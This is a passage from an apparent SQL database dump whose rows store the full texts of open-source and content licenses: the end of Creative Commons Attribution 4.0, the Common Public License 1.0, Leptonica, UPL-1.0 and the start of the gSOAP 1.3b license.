other CC-licensed material, or material used under an exception\nor limitation to copyright. More considerations for licensors : wiki.creativecommons.org/Considerations_for_licensors\n\nConsiderations for the public: By using one of our public licenses, a licensor\ngrants the public permission to use the licensed material under specified\nterms and conditions. If the licensor\'s permission is not necessary for any\nreason–for example, because of any applicable exception or limitation to copyright–then\nthat use is not regulated by the license. Our licenses grant only permissions\nunder copyright and certain other rights that a licensor has authority to\ngrant. Use of the licensed material may still be restricted for other reasons,\nincluding because others have copyright or other rights in the material. A\nlicensor may make special requests, such as asking that all changes be marked\nor described. Although not required by our licenses, you are encouraged to\nrespect those requests where reasonable. More considerations for the public\n: wiki.creativecommons.org/Considerations_for_licensees Creative Commons Attribution\n4.0 International Public License\n\nBy exercising the Licensed Rights (defined below), You accept and agree to\nbe bound by the terms and conditions of this Creative Commons Attribution\n4.0 International Public License (\"Public License\"). To the extent this Public\nLicense may be interpreted as a contract, You are granted the Licensed Rights\nin consideration of Your acceptance of these terms and conditions, and the\nLicensor grants You such rights in consideration of benefits the Licensor\nreceives from making the Licensed Material available under these terms and\nconditions.\n\nSection 1 – Definitions.\n\na. Adapted Material means material subject to Copyright and Similar Rights\nthat is derived from or based upon the Licensed Material and in which the\nLicensed Material is translated, altered, arranged, transformed, or otherwise\nmodified in a manner requiring permission under the Copyright and Similar\nRights held by the Licensor. For purposes of this Public License, where the\nLicensed Material is a musical work, performance, or sound recording, Adapted\nMaterial is always produced where the Licensed Material is synched in timed\nrelation with a moving image.\n\nb. Adapter\'s License means the license You apply to Your Copyright and Similar\nRights in Your contributions to Adapted Material in accordance with the terms\nand conditions of this Public License.\n\nc. Copyright and Similar Rights means copyright and/or similar rights closely\nrelated to copyright including, without limitation, performance, broadcast,\nsound recording, and Sui Generis Database Rights, without regard to how the\nrights are labeled or categorized. For purposes of this Public License, the\nrights specified in Section 2(b)(1)-(2) are not Copyright and Similar Rights.\n\nd. Effective Technological Measures means those measures that, in the absence\nof proper authority, may not be circumvented under laws fulfilling obligations\nunder Article 11 of the WIPO Copyright Treaty adopted on December 20, 1996,\nand/or similar international agreements.\n\ne. Exceptions and Limitations means fair use, fair dealing, and/or any other\nexception or limitation to Copyright and Similar Rights that applies to Your\nuse of the Licensed Material.\n\nf. Licensed Material means the artistic or literary work, database, or other\nmaterial to which the Licensor applied this Public License.\n\ng. Licensed Rights means the rights granted to You subject to the terms and\nconditions of this Public License, which are limited to all Copyright and\nSimilar Rights that apply to Your use of the Licensed Material and that the\nLicensor has authority to license.\n\nh. Licensor means the individual(s) or entity(ies) granting rights under this\nPublic License.\n\ni. Share means to provide material to the public by any means or process that\nrequires permission under the Licensed Rights, such as reproduction, public\ndisplay, public performance, distribution, dissemination, communication, or\nimportation, and to make material available to the public including in ways\nthat members of the public may access the material from a place and at a time\nindividually chosen by them.\n\nj. Sui Generis Database Rights means rights other than copyright resulting\nfrom Directive 96/9/EC of the European Parliament and of the Council of 11\nMarch 1996 on the legal protection of databases, as amended and/or succeeded,\nas well as other essentially equivalent rights anywhere in the world.\n\nk. You means the individual or entity exercising the Licensed Rights under\nthis Public License. Your has a corresponding meaning.\n\nSection 2 – Scope.\n\n a. License grant.\n\n1. Subject to the terms and conditions of this Public License, the Licensor\nhereby grants You a worldwide, royalty-free, non-sublicensable, non-exclusive,\nirrevocable license to exercise the Licensed Rights in the Licensed Material\nto:\n\n A. reproduce and Share the Licensed Material, in whole or in part; and\n\n B. produce, reproduce, and Share Adapted Material.\n\n2. Exceptions and Limitations. For the avoidance of doubt, where Exceptions\nand Limitations apply to Your use, this Public License does not apply, and\nYou do not need to comply with its terms and conditions.\n\n 3. Term. The term of this Public License is specified in Section 6(a).\n\n4. Media and formats; technical modifications allowed. The Licensor authorizes\nYou to exercise the Licensed Rights in all media and formats whether now known\nor hereafter created, and to make technical modifications necessary to do\nso. The Licensor waives and/or agrees not to assert any right or authority\nto forbid You from making technical modifications necessary to exercise the\nLicensed Rights, including technical modifications necessary to circumvent\nEffective Technological Measures. For purposes of this Public License, simply\nmaking modifications authorized by this Section 2(a)(4) never produces Adapted\nMaterial.\n\n 5. Downstream recipients.\n\nA. Offer from the Licensor – Licensed Material. Every recipient of the Licensed\nMaterial automatically receives an offer from the Licensor to exercise the\nLicensed Rights under the terms and conditions of this Public License.\n\nB. No downstream restrictions. You may not offer or impose any additional\nor different terms or conditions on, or apply any Effective Technological\nMeasures to, the Licensed Material if doing so restricts exercise of the Licensed\nRights by any recipient of the Licensed Material.\n\n6. No endorsement. Nothing in this Public License constitutes or may be construed\nas permission to assert or imply that You are, or that Your use of the Licensed\nMaterial is, connected with, or sponsored, endorsed, or granted official status\nby, the Licensor or others designated to receive attribution as provided in\nSection 3(a)(1)(A)(i).\n\n b. Other rights.\n\n1. Moral rights, such as the right of integrity, are not licensed under this\nPublic License, nor are publicity, privacy, and/or other similar personality\nrights; however, to the extent possible, the Licensor waives and/or agrees\nnot to assert any such rights held by the Licensor to the limited extent necessary\nto allow You to exercise the Licensed Rights, but not otherwise.\n\n2. Patent and trademark rights are not licensed under this Public License.\n\n3. To the extent possible, the Licensor waives any right to collect royalties\nfrom You for the exercise of the Licensed Rights, whether directly or through\na collecting society under any voluntary or waivable statutory or compulsory\nlicensing scheme. In all other cases the Licensor expressly reserves any right\nto collect such royalties.\n\nSection 3 – License Conditions.\n\nYour exercise of the Licensed Rights is expressly made subject to the following\nconditions.\n\n a. Attribution.\n\n1. If You Share the Licensed Material (including in modified form), You must:\n\nA. retain the following if it is supplied by the Licensor with the Licensed\nMaterial:\n\ni. identification of the creator(s) of the Licensed Material and any others\ndesignated to receive attribution, in any reasonable manner requested by the\nLicensor (including by pseudonym if designated);\n\n ii. a copyright notice;\n\n iii. a notice that refers to this Public License;\n\n iv. a notice that refers to the disclaimer of warranties;\n\nv. a URI or hyperlink to the Licensed Material to the extent reasonably practicable;\n\nB. indicate if You modified the Licensed Material and retain an indication\nof any previous modifications; and\n\nC. indicate the Licensed Material is licensed under this Public License, and\ninclude the text of, or the URI or hyperlink to, this Public License.\n\n2. You may satisfy the conditions in Section 3(a)(1) in any reasonable manner\nbased on the medium, means, and context in which You Share the Licensed Material.\nFor example, it may be reasonable to satisfy the conditions by providing a\nURI or hyperlink to a resource that includes the required information.\n\n3. If requested by the Licensor, You must remove any of the information required\nby Section 3(a)(1)(A) to the extent reasonably practicable.\n\n4. If You Share Adapted Material You produce, the Adapter\'s License You apply\nmust not prevent recipients of the Adapted Material from complying with this\nPublic License.\n\nSection 4 – Sui Generis Database Rights.\n\nWhere the Licensed Rights include Sui Generis Database Rights that apply to\nYour use of the Licensed Material:\n\na. for the avoidance of doubt, Section 2(a)(1) grants You the right to extract,\nreuse, reproduce, and Share all or a substantial portion of the contents of\nthe database;\n\nb. if You include all or a substantial portion of the database contents in\na database in which You have Sui Generis Database Rights, then the database\nin which You have Sui Generis Database Rights (but not its individual contents)\nis Adapted Material; and\n\nc. You must comply with the conditions in Section 3(a) if You Share all or\na substantial portion of the contents of the database.\n\nFor the avoidance of doubt, this Section 4 supplements and does not replace\nYour obligations under this Public License where the Licensed Rights include\nother Copyright and Similar Rights.\n\nSection 5 – Disclaimer of Warranties and Limitation of Liability.\n\na. Unless otherwise separately undertaken by the Licensor, to the extent possible,\nthe Licensor offers the Licensed Material as-is and as-available, and makes\nno representations or warranties of any kind concerning the Licensed Material,\nwhether express, implied, statutory, or other. This includes, without limitation,\nwarranties of title, merchantability, fitness for a particular purpose, non-infringement,\nabsence of latent or other defects, accuracy, or the presence or absence of\nerrors, whether or not known or discoverable. Where disclaimers of warranties\nare not allowed in full or in part, this disclaimer may not apply to You.\n\nb. To the extent possible, in no event will the Licensor be liable to You\non any legal theory (including, without limitation, negligence) or otherwise\nfor any direct, special, indirect, incidental, consequential, punitive, exemplary,\nor other losses, costs, expenses, or damages arising out of this Public License\nor use of the Licensed Material, even if the Licensor has been advised of\nthe possibility of such losses, costs, expenses, or damages. Where a limitation\nof liability is not allowed in full or in part, this limitation may not apply\nto You.\n\nc. The disclaimer of warranties and limitation of liability provided above\nshall be interpreted in a manner that, to the extent possible, most closely\napproximates an absolute disclaimer and waiver of all liability.\n\nSection 6 – Term and Termination.\n\na. This Public License applies for the term of the Copyright and Similar Rights\nlicensed here. However, if You fail to comply with this Public License, then\nYour rights under this Public License terminate automatically.\n\nb. Where Your right to use the Licensed Material has terminated under Section\n6(a), it reinstates:\n\n1. automatically as of the date the violation is cured, provided it is cured\nwithin 30 days of Your discovery of the violation; or\n\n 2. upon express reinstatement by the Licensor.\n\nc. For the avoidance of doubt, this Section 6(b) does not affect any right\nthe Licensor may have to seek remedies for Your violations of this Public\nLicense.\n\nd. For the avoidance of doubt, the Licensor may also offer the Licensed Material\nunder separate terms or conditions or stop distributing the Licensed Material\nat any time; however, doing so will not terminate this Public License.\n\n e. Sections 1, 5, 6, 7, and 8 survive termination of this Public License.\n\nSection 7 – Other Terms and Conditions.\n\na. The Licensor shall not be bound by any additional or different terms or\nconditions communicated by You unless expressly agreed.\n\nb. Any arrangements, understandings, or agreements regarding the Licensed\nMaterial not stated herein are separate from and independent of the terms\nand conditions of this Public License.\n\nSection 8 – Interpretation.\n\na. For the avoidance of doubt, this Public License does not, and shall not\nbe interpreted to, reduce, limit, restrict, or impose conditions on any use\nof the Licensed Material that could lawfully be made without permission under\nthis Public License.\n\nb. To the extent possible, if any provision of this Public License is deemed\nunenforceable, it shall be automatically reformed to the minimum extent necessary\nto make it enforceable. If the provision cannot be reformed, it shall be severed\nfrom this Public License without affecting the enforceability of the remaining\nterms and conditions.\n\nc. No term or condition of this Public License will be waived and no failure\nto comply consented to unless expressly agreed to by the Licensor.\n\nd. Nothing in this Public License constitutes or may be interpreted as a limitation\nupon, or waiver of, any privileges and immunities that apply to the Licensor\nor You, including from the legal processes of any jurisdiction or authority.\n\nCreative Commons is not a party to its public licenses. Notwithstanding, Creative\nCommons may elect to apply one of its public licenses to material it publishes\nand in those instances will be considered the \"Licensor.\" The text of the\nCreative Commons public licenses is dedicated to the public domain under the\nCC0 Public Domain Dedication. Except for the limited purpose of indicating\nthat material is shared under a Creative Commons public license or as otherwise\npermitted by the Creative Commons policies published at creativecommons.org/policies,\nCreative Commons does not authorize the use of the trademark \"Creative Commons\"\nor any other trademark or logo of Creative Commons without its prior written\nconsent including, without limitation, in connection with any unauthorized\nmodifications to any of its public licenses or any other arrangements, understandings,\nor agreements concerning use of licensed material. For the avoidance of doubt,\nthis paragraph does not form part of the public licenses.\n\nCreative Commons may be contacted at creativecommons.org.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(176,'CPL-1.0','Common Public License Version 1.0\n\nTHE ACCOMPANYING PROGRAM IS PROVIDED UNDER THE TERMS OF THIS COMMON PUBLIC\nLICENSE (\"AGREEMENT\"). ANY USE, REPRODUCTION OR DISTRIBUTION OF THE PROGRAM\nCONSTITUTES RECIPIENT\'S ACCEPTANCE OF THIS AGREEMENT. 1.\n\nDEFINITIONS\n\n\"Contribution\" means:\n\na) in the case of the initial Contributor, the initial code and documentation\ndistributed under this Agreement, and\n\n b) in the case of each subsequent Contributor:\n\n i) changes to the Program, and\n\n ii) additions to the Program;\n\nwhere such changes and/or additions to the Program originate from and are\ndistributed by that particular Contributor. A Contribution \'originates\' from\na Contributor if it was added to the Program by such Contributor itself or\nanyone acting on such Contributor\'s behalf. Contributions do not include additions\nto the Program which: (i) are separate modules of software distributed in\nconjunction with the Program under their own license agreement, and (ii) are\nnot derivative works of the Program.\n\n\"Contributor\" means any person or entity that distributes the Program.\n\n\"Licensed Patents \" mean patent claims licensable by a Contributor which are\nnecessarily infringed by the use or sale of its Contribution alone or when\ncombined with the Program.\n\n\"Program\" means the Contributions distributed in accordance with this Agreement.\n\n\"Recipient\" means anyone who receives the Program under this Agreement, including\nall Contributors. 2.\n\nGRANT OF RIGHTS\n\na) Subject to the terms of this Agreement, each Contributor hereby grants\nRecipient a non-exclusive, worldwide, royalty-free copyright license to reproduce,\nprepare derivative works of, publicly display, publicly perform, distribute\nand sublicense the Contribution of such Contributor, if any, and such derivative\nworks, in source code and object code form.\n\nb) Subject to the terms of this Agreement, each Contributor hereby grants\nRecipient a non-exclusive, worldwide, royalty-free patent license under Licensed\nPatents to make, use, sell, offer to sell, import and otherwise transfer the\nContribution of such Contributor, if any, in source code and object code form.\nThis patent license shall apply to the combination of the Contribution and\nthe Program if, at the time the Contribution is added by the Contributor,\nsuch addition of the Contribution causes such combination to be covered by\nthe Licensed Patents. The patent license shall not apply to any other combinations\nwhich include the Contribution. No hardware per se is licensed hereunder.\n\nc) Recipient understands that although each Contributor grants the licenses\nto its Contributions set forth herein, no assurances are provided by any Contributor\nthat the Program does not infringe the patent or other intellectual property\nrights of any other entity. Each Contributor disclaims any liability to Recipient\nfor claims brought by any other entity based on infringement of intellectual\nproperty rights or otherwise. As a condition to exercising the rights and\nlicenses granted hereunder, each Recipient hereby assumes sole responsibility\nto secure any other intellectual property rights needed, if any. For example,\nif a third party patent license is required to allow Recipient to distribute\nthe Program, it is Recipient\'s responsibility to acquire that license before\ndistributing the Program.\n\nd) Each Contributor represents that to its knowledge it has sufficient copyright\nrights in its Contribution, if any, to grant the copyright license set forth\nin this Agreement. 3.\n\nREQUIREMENTS\n\nA Contributor may choose to distribute the Program in object code form under\nits own license agreement, provided that:\n\n a) it complies with the terms and conditions of this Agreement; and\n\n b) its license agreement:\n\ni) effectively disclaims on behalf of all Contributors all warranties and\nconditions, express and implied, including warranties or conditions of title\nand non-infringement, and implied warranties or conditions of merchantability\nand fitness for a particular purpose;\n\nii) effectively excludes on behalf of all Contributors all liability for damages,\nincluding direct, indirect, special, incidental and consequential damages,\nsuch as lost profits;\n\niii) states that any provisions which differ from this Agreement are offered\nby that Contributor alone and not by any other party; and\n\niv) states that source code for the Program is available from such Contributor,\nand informs licensees how to obtain it in a reasonable manner on or through\na medium customarily used for software exchange.\n\nWhen the Program is made available in source code form:\n\n a) it must be made available under this Agreement; and\n\n b) a copy of this Agreement must be included with each copy of the Program.\n\nContributors may not remove or alter any copyright notices contained within\nthe Program.\n\nEach Contributor must identify itself as the originator of its Contribution,\nif any, in a manner that reasonably allows subsequent Recipients to identify\nthe originator of the Contribution. 4.\n\nCOMMERCIAL DISTRIBUTION\n\nCommercial distributors of software may accept certain responsibilities with\nrespect to end users, business partners and the like. While this license is\nintended to facilitate the commercial use of the Program, the Contributor\nwho includes the Program in a commercial product offering should do so in\na manner which does not create potential liability for other Contributors.\nTherefore, if a Contributor includes the Program in a commercial product offering,\nsuch Contributor (\"Commercial Contributor\") hereby agrees to defend and indemnify\nevery other Contributor (\"Indemnified Contributor\") against any losses, damages\nand costs (collectively \"Losses\") arising from claims, lawsuits and other\nlegal actions brought by a third party against the Indemnified Contributor\nto the extent caused by the acts or omissions of such Commercial Contributor\nin connection with its distribution of the Program in a commercial product\noffering. The obligations in this section do not apply to any claims or Losses\nrelating to any actual or alleged intellectual property infringement. In order\nto qualify, an Indemnified Contributor must: a) promptly notify the Commercial\nContributor in writing of such claim, and b) allow the Commercial Contributor\nto control, and cooperate with the Commercial Contributor in, the defense\nand any related settlement negotiations. The Indemnified Contributor may participate\nin any such claim at its own expense.\n\nFor example, a Contributor might include the Program in a commercial product\noffering, Product X. That Contributor is then a Commercial Contributor. If\nthat Commercial Contributor then makes performance claims, or offers warranties\nrelated to Product X, those performance claims and warranties are such Commercial\nContributor\'s responsibility alone. Under this section, the Commercial Contributor\nwould have to defend claims against the other Contributors related to those\nperformance claims and warranties, and if a court requires any other Contributor\nto pay any damages as a result, the Commercial Contributor must pay those\ndamages. 5.\n\nNO WARRANTY\n\nEXCEPT AS EXPRESSLY SET FORTH IN THIS AGREEMENT, THE PROGRAM IS PROVIDED ON\nAN \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, EITHER EXPRESS\nOR IMPLIED INCLUDING, WITHOUT LIMITATION, ANY WARRANTIES OR CONDITIONS OF\nTITLE, NON-INFRINGEMENT, MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE.\nEach Recipient is solely responsible for determining the appropriateness of\nusing and distributing the Program and assumes all risks associated with its\nexercise of rights under this Agreement, including but not limited to the\nrisks and costs of program errors, compliance with applicable laws, damage\nto or loss of data, programs or equipment, and unavailability or interruption\nof operations. 6.\n\nDISCLAIMER OF LIABILITY\n\nEXCEPT AS EXPRESSLY SET FORTH IN THIS AGREEMENT, NEITHER RECIPIENT NOR ANY\nCONTRIBUTORS SHALL HAVE ANY LIABILITY FOR ANY DIRECT, INDIRECT, INCIDENTAL,\nSPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING WITHOUT LIMITATION\nLOST PROFITS), HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,\nSTRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY\nWAY OUT OF THE USE OR DISTRIBUTION OF THE PROGRAM OR THE EXERCISE OF ANY RIGHTS\nGRANTED HEREUNDER, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. 7.\n\nGENERAL\n\nIf any provision of this Agreement is invalid or unenforceable under applicable\nlaw, it shall not affect the validity or enforceability of the remainder of\nthe terms of this Agreement, and without further action by the parties hereto,\nsuch provision shall be reformed to the minimum extent necessary to make such\nprovision valid and enforceable.\n\nIf Recipient institutes patent litigation against a Contributor with respect\nto a patent applicable to software (including a cross-claim or counterclaim\nin a lawsuit), then any patent licenses granted by that Contributor to such\nRecipient under this Agreement shall terminate as of the date such litigation\nis filed. In addition, if Recipient institutes patent litigation against any\nentity (including a cross-claim or counterclaim in a lawsuit) alleging that\nthe Program itself (excluding combinations of the Program with other software\nor hardware) infringes such Recipient\'s patent(s), then such Recipient\'s rights\ngranted under Section 2(b) shall terminate as of the date such litigation\nis filed.\n\nAll Recipient\'s rights under this Agreement shall terminate if it fails to\ncomply with any of the material terms or conditions of this Agreement and\ndoes not cure such failure in a reasonable period of time after becoming aware\nof such noncompliance. If all Recipient\'s rights under this Agreement terminate,\nRecipient agrees to cease use and distribution of the Program as soon as reasonably\npracticable. However, Recipient\'s obligations under this Agreement and any\nlicenses granted by Recipient relating to the Program shall continue and survive.\n\nEveryone is permitted to copy and distribute copies of this Agreement, but\nin order to avoid inconsistency the Agreement is copyrighted and may only\nbe modified in the following manner. The Agreement Steward reserves the right\nto publish new versions (including revisions) of this Agreement from time\nto time. No one other than the Agreement Steward has the right to modify this\nAgreement. IBM is the initial Agreement Steward. IBM may assign the responsibility\nto serve as the Agreement Steward to a suitable separate entity. Each new\nversion of the Agreement will be given a distinguishing version number. The\nProgram (including Contributions) may always be distributed subject to the\nversion of the Agreement under which it was received. In addition, after a\nnew version of the Agreement is published, Contributor may elect to distribute\nthe Program (including its Contributions) under the new version. Except as\nexpressly stated in Sections 2(a) and 2(b) above, Recipient receives no rights\nor licenses to the intellectual property of any Contributor under this Agreement,\nwhether expressly, by implication, estoppel or otherwise. All rights in the\nProgram not expressly granted under this Agreement are reserved.\n\nThis Agreement is governed by the laws of the State of New York and the intellectual\nproperty laws of the United States of America. No party to this Agreement\nwill bring a legal action under this Agreement more than one year after the\ncause of action arose. Each party waives its rights to a jury trial in any\nresulting litigation.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(177,'Leptonica','Copyright (C) 2001 Leptonica. All rights reserved.\n\nThis software is distributed in the hope that it will be useful, but with\nNO WARRANTY OF ANY KIND.\n\nNo author or distributor accepts responsibility to anyone for the consequences\nof using this software, or for whether it serves any particular purpose or\nworks at all, unless he or she says so in writing. Everyone is granted permission\nto copy, modify and redistribute this source code, for commercial or non-commercial\npurposes, with the following restrictions:\n\n (1) the origin of this source code must not be misrepresented;\n\n (2) modified versions must be plainly marked as such; and\n\n(3) this notice may not be removed or altered from any source or modified\nsource distribution.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(178,'UPL-1.0','Copyright (c) [year] [copyright holders] The Universal Permissive License\n(UPL), Version 1.0\n\nSubject to the condition set forth below, permission is hereby granted to\nany person obtaining a copy of this software, associated documentation and/or\ndata (collectively the \"Software\"), free of charge and under any and all copyright\nrights in the Software, and any and all patent rights owned or freely licensable\nby each licensor hereunder covering either (i) the unmodified Software as\ncontributed to or provided by such licensor, or (ii) the Larger Works (as\ndefined below), to deal in both\n\n (a) the Software, and\n\n(b) any piece of software and/or hardware listed in the lrgrwrks.txt file\nif one is included with the Software (each a \"Larger Work\" to which the Software\nis contributed by such licensors),\n\nwithout restriction, including without limitation the rights to copy, create\nderivative works of, display, perform, and distribute the Software and make,\nuse, sell, offer for sale, import, export, have made, and have sold the Software\nand the Larger Work(s), and to sublicense the foregoing rights on either these\nor other terms.\n\nThis license is subject to the following condition:\n\nThe above copyright notice and either this complete permission notice or at\na minimum a reference to the UPL must be included in all copies or substantial\nportions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS\nFOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS\nOR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,\nWHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF\nOR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(179,'gSOAP-1.3b','gSOAP Public License\n\nVersion 1.3b The gSOAP public license is derived from the Mozilla Public License\n(MPL1.1). The sections that were deleted from the original MPL1.1 text are\n1.0.1, 2.1.(c),(d), 2.2.(c),(d), 8.2.(b), 10, and 11. Section 3.8 was added.\nThe modified sections are 2.1.(b), 2.2.(b), 3.2 (simplified), 3.5 (deleted\nthe last sentence), and 3.6 (simplified).\n\nThis license applies to the gSOAP software package, with the exception of\nthe soapcpp2 and wsdl2h source code located in gsoap/src and gsoap/wsdl, all\ncode generated by soapcpp2 and wsdl2h, the UDDI source code gsoap/uddi2, and\nthe Web server sample source code samples/webserver. To use any of these software\ntools and components commercially, a commercial license is required and can\nbe obtained from www.genivia.com.\n\n 1 DEFINITIONS.\n\n 1.0.1.\n\n1.1. \"Contributor\" means each entity that creates or contributes to the creation\nof Modifications.\n\n1.2. \"Contributor Version\" means the combination of the Original Code, prior\nModifications used by a Contributor, and the Modifications made by that particular\nContributor.\n\n1.3. \"Covered Code\" means the Original Code, or Modifications or the combination\nof the Original Code, and Modifications, in each case including portions thereof.\n\n1.4. \"Electronic Distribution Mechanism\" means a mechanism generally accepted\nin the software development community for the electronic transfer of data.\n\n 1.5. \"Executable\" means Covered Code in any form other than Source Code.\n\n1.6. \"Initial Developer\" means the individual or entity identified as the\nInitial Developer in the Source Code notice required by Exhibit A.\n\n1.7. \"Larger Work\" means a work which combines Covered Code or portions thereof\nwith code not governed by the terms of this License.\n\n 1.8. \"License\" means this document.\n\n1.8.1. \"Licensable\" means having the right to grant, to the maximum extent\npossible, whether at the time of the initial grant or subsequently acquired,\nany and all of the rights conveyed herein.\n\n1.9. \"Modifications\" means any addition to or deletion from the substance\nor structure of either the Original Code or any previous Modifications. When\nCovered Code is released as a series of files, a Modification is:\n\nA. Any addition to or deletion from the contents of a file containing Original\nCode or previous Modifications.\n\nB. Any new file that contains any part of the Original Code, or previous Modifications.\n\n1.10. \"Original Code\" means Source Code of computer software code which is\ndescribed in the Source Code notice required by Exhibit A as Original Code,\nand which, at the time of its release under this License is not already Covered\nCode governed by this License.\n\n1.10.1. \"Patent Claims\" means any patent claim(s), now owned or hereafter\nacquired, including without limitation, method, process, and apparatus claims,\nin any patent Licensable by grantor.\n\n1.11. \"Source Code\" means the preferred form of the Covered Code for making\nmodifications to it, including all modules it contains, plus any associated\ninterface definition files, scripts used to control compilation and installation\nof an Executable, or source code differential comparisons against either the\nOriginal Code or another well known, available Covered Code of the Contributor\'s\nchoice. The Source Code can be in a compressed or archival form, provided\nthe appropriate decompression or de-archiving software is widely available\nfor no charge.\n\n1.12. \"You\" (or \"Your\") means an individual or a legal entity exercising rights\nunder, and complying with all of the terms of, this License or a future version\nof this License issued under Section 6.1. For legal entities, \"You\" includes\nany entity which controls, is controlled by, or is under common control with\nYou. For purposes of this definition, \"control\" means (a) the power, direct\nor indirect, to cause the direction or management of such entity, whether\nby contract or otherwise, or (b) ownership of more than fifty percent (50%)\nof the outstanding shares or beneficial ownership of such entity.\n\n 2 SOURCE CODE LICENSE.\n\n 2.1. The Initial Developer Grant.\n\nThe Initial Developer hereby grants You a world-wide, royalty-free, non-exclusive\nlicense, subject to third party intellectual property claims:\n\n(a) under intellectual property rights (other than patent or trademark) Licensable\nby Initial Developer to use, reproduce, modify, display, perform, sublicense\nand distribute the Original Code (or portions thereof) with or without Modifications,\nand/or as part of a Larger Work; and\n\n(b) under patents now or hereafter owned or controlled by Initial Developer,\nto make, have made, use and sell (\"offer to sell and import\") the Original\nCode, Modifications, or portions thereof, but solely to the extent that any\nsuch patent is reasonably necessary to enable You to utilize, alone or in\ncombination with other software, the Original Code, Modifications, or any\ncombination or portions thereof.\n\n (c)\n\n (d)\n\n 2.2. Contributor Grant.\n\nSubject to third party intellectual property claims, each Contributor hereby\ngrants You a world-wide, royalty-free, non-exclusive license\n\n(a) under intellectual property rights (other than patent or trademark) Licensable\nby Contributor, to use, reproduce, modify, display, perform, sublicense and\ndistribute the Modifications created by such Contributor (or portions thereof)\neither on an unmodified basis, with other Modifications, as Covered Code and/or\nas part of a Larger Work; and\n\n(b) under patents now or hereafter owned or controlled by Contributor, to\nmake, have made, use and sell (\"offer to sell and import\") the Contributor\nVersion (or portions thereof), but solely to the extent that any such patent\nis reasonably necessary to enable You to utilize, alone or in combination\nwith other software, the Contributor Version (or portions thereof).\n\n (c)\n\n (d)\n\n 3 DISTRIBUTION OBLIGATIONS.\n\n 3.1. Application of License.\n\nThe Modifications which You create or to which You contribute are governed\nby the terms of this License, including without limitation Section 2.2. The\nSource Code version of Covered Code may be distributed only under the terms\nof this License or a future version of this License released under Section\n6.1, and You must include a copy of this License with every copy of the Source\nCode You distribute. You may not offer or impose any terms on any Source Code\nversion that alters or restricts the applicable version of this License or\nthe recipients\' rights hereunder. However, You may include an additional document\noffering the additional rights described in Section 3.5.\n\n 3.2. Availability of Source Code.\n\nAny Modification created by You shall be provided to the Initial Developer\nin Source Code form and are subject to the terms of the License.\n\n 3.3. Description of Modifications.\n\nYou must cause all Covered Code to which You contribute to contain a file\ndocumenting the changes You made to create that Covered Code and the date\nof any change. You must include a prominent statement that the Modification\nis derived, directly or indirectly, from Original Code provided by the Initial\nDeveloper and including the name of the Initial Developer in (a) the Source\nCode, and (b) in any notice in an Executable version or related documentation\nin which You describe the origin or ownership of the Covered Code.\n\n 3.4. Intellectual Property Matters.\n\n(a) Third Party Claims. If Contributor has knowledge that a license under\na third party\'s intellectual property rights is required to exercise the rights\ngranted by such Contributor under Sections 2.1 or 2.2, Contributor must include\na text file with the Source Code distribution titled \"LEGAL\" which describes\nthe claim and the party making the claim in sufficient detail that a recipient\nwill know whom to contact. If Contributor obtains such knowledge after the\nModification is made available as described in Section 3.2, Contributor shall\npromptly modify the LEGAL file in all copies Contributor makes available thereafter\nand shall take other steps (such as notifying appropriate mailing lists or\nnewsgroups) reasonably calculated to inform those who received the Covered\nCode that new knowledge has been obtained.\n\n(b) Contributor APIs. If Contributor\'s Modifications include an application\nprogramming interface and Contributor has knowledge of patent licenses which\nare reasonably necessary to implement that API, Contributor must also include\nthis information in the LEGAL file.\n\n(c) Representations. Contributor represents that, except as disclosed pursuant\nto Section 3.4(a) above, Contributor believes that Contributor\'s Modifications\nare Contributor\'s original creation(s) and/or Contributor has sufficient rights\nto grant the rights conveyed by this License.\n\n 3.5. Required Notices.\n\nYou must duplicate the notice in Exhibit A in each file of the Source Code.\nIf it is not possible to put such notice in a particular Source Code file\ndue to its structure, then You must include such notice in a location (such\nas a relevant directory) where a user would be likely to look for such a notice.\nIf You created one or more Modification(s) You may add your name as a Contributor\nto the notice described in Exhibit A. You must also duplicate this License\nin any documentation for the Source Code where You describe recipients\' rights\nor ownership rights relating to Covered Code. You may choose to offer, and\nto charge a fee for, warranty, support, indemnity or liability obligations\nto one or more recipients of Covered Code. However, You may do so only on\nYour own behalf, and not on behalf of the Initial Developer or any Contributor.\n\n 3.6. Distribution of Executable Versions.\n\nYou may distribute Covered Code in Executable form only if the requirements\nof Section 3.1-3.5 have been met for that Covered Code. You may distribute\nthe Executable version of Covered Code or ownership rights under a license\nof Your choice, which may contain terms different from this License, provided\nthat You are in compliance with the terms of this License and that the license\nfor the Executable version does not attempt to limit or alter the recipient\'s\nrights in the Source Code version from the rights set forth in this License.\nIf You distribute the Executable version under a different license You must\nmake it absolutely clear that any terms which differ from this License are\noffered by You alone, not by the Initial Developer or any Contributor. If\nyou distribute executable versions containing Covered Code as part of a product,\nyou must reproduce the notice in Exhibit B in the documentation and/or other\nmaterials provided with the product.\n\n 3.7. Larger Works.\n\nYou may create a Larger Work by combining Covered Code with other code not\ngoverned by the terms of this License and distribute the Larger Work as a\nsingle product. In such a case, You must make sure the requirements of this\nLicense are fulfilled for the Covered Code.\n\n 3.8. Restrictions.\n\nYou may not remove any product identification, copyright, proprietary notices\nor labels from gSOAP.\n\n 4 INABILITY TO COMPLY DUE TO STATUTE OR REGULATION.\n\nIf it is impossible for You to comply with any of the terms of this License\nwith respect to some or all of the Covered Code due to statute, judicial order,\nor regulation then You must: (a) comply with the terms of this License 